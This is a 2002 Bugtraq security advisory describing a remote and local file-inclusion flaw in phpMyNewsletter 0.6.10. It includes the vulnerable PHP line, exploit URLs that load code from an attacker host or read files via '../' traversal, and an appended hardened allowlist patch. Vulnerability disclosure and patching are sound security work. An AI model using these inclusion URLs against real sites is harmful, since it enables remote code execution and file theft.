[27295] in bugtraq


phpMyNewsletter

daemon@ATHENA.MIT.EDU (Frog Man)
Thu Oct 3 23:59:05 2002

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Thu, 03 Oct 2002 17:40:12 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F86x8iz78L4oD8N69xZ00005996@hotmail.com>

Information :
°°°°°°°°°°°°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°°°°°°°°°
---- /include/customize.php ----
<?
$langfile = $l;

include $l;
?>
---- /include/customize.php ----


Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With http://[attacker]/code.txt containing :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view


Patch :
°°°°°°°
The author has been alerted and the latest version (0.7beta1) has been patched.


More details
- in French :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n
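
Added example, not part of the original post and not phpMyNewsletter's own patch: one way to harden the include in /include/customize.php by mapping the l parameter onto an allowlist of language files. The lang directory, the language names and the resolve_langfile helper are assumptions made for illustration.

```php
<?php
// Hardened replacement for the include in /include/customize.php (added example).
// Assumptions: language files live in a "lang" directory next to this script and
// are named <name>.php; the directory and the names below are hypothetical.

const LANG_DIR = __DIR__ . '/lang';
const ALLOWED_LANGS = ['english', 'french'];
const DEFAULT_LANG = 'english';

// Map a user-supplied selector to a file inside LANG_DIR.
// Anything that is not on the allowlist falls back to the default language.
function resolve_langfile($requested): string
{
    // Arrays (?l[]=x) and other non-strings fall back to the default.
    $lang = is_string($requested) ? $requested : DEFAULT_LANG;

    // Strict allowlist comparison: URLs, "../" sequences and absolute paths
    // can never match an entry, so they never reach include.
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        $lang = DEFAULT_LANG;
    }

    // Defence in depth: the resolved file must exist and stay inside LANG_DIR.
    $real = realpath(LANG_DIR . '/' . $lang . '.php');
    $base = realpath(LANG_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file not available');
    }
    return $real;
}

// Read the selector from the query string explicitly instead of relying on
// register_globals to populate $l from the request.
try {
    $langfile = resolve_langfile($_GET['l'] ?? DEFAULT_LANG);
    include $langfile;
} catch (RuntimeException $e) {
    http_response_code(500);
    exit('language file not available');
}
```

With allow_url_include set to Off in php.ini, PHP itself also refuses http:// paths passed to include, independently of this check.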



